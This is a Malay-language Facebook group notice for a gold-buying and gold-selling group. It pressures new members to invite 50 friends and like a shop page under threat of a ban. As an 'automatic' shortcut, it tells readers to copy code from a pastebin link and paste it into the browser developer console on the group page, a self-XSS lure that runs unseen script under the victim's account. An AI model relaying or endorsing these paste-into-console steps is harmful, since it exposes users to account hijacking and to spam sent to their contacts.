JOM EMAS - BELI PAMP JUAL PAMP

Selamat datang.
Ahli baru, sila invite 50 rakan sebelum post iklan. Jika tidak anda akan di Ban..
Terima Kasih...
PERHATIAN !!!
- Sudah ramai ahli dlm group ini admin ban fb mereka kerana tidak add 50 rakan dan sila Like page FB ini >> https://www.facebook.com/KedaiEmasSaJewellery siapa tak nak kehilangan keahlian dlm group ini sila lakukan segera..Harap maklum !
- Sudah ramai Ahli dlm Group ini telah admin ban kerana gambar produk yg menjolok mata atau mendedah aurat wanita (Seksi / Lucah).. Hati2 kepada peniaga produk yg post gambar2 yg dedah aurat kerana group ini sudah terlalu besar, jadi perlu jaga setiap posting anda. Kerana setiap post itu dipersoalkan di akhirat kelak.. admin tidak bertangungjawab dan terlibat ke atas semua posting anda.. Harap Maklum !
----------------------------------------------------------.
Jika anda malas untuk add manual kami juga sediakan cara automatik, sila ikuti langkah-langkah di bawah..

CARA KEDUA ( Tambah rakan anda ) - Ikut step di bawah untuk cepat
1. Copy semua code dalam link ni http://pastebin.com/raw.php?i=zmPvXdvh
( Buka link tekan Ctrl dan A lepas tu Copy )
2. Masuk semula ke group :
JOM EMAS - BELI PAMP JUAL PAMP
- Pengguna Google Chrome: tekan F12 atau Ctrl+Shift+C dan paste kod yang dah copy tadi dan PASTE atau tekan Ctrl+v pada bahagian Console dan Enter dan Tunggu Tunggu sehingga keluar tanda refresh.
ATAU
- Pengguna Mozilla Firefox : tekan Ctrl+Shift+K dan paste kod yang dh copy tadi dalam tab yg muncul pada bahagian bawah sekali. PASTE atau tekan Ctrl+v dan Tekan enter. Tunggu sehingga keluar tanda refresh.
3. Tekan enter. Tunggu sehingga keluar tanda refresh. DONE!
Terima Kasih...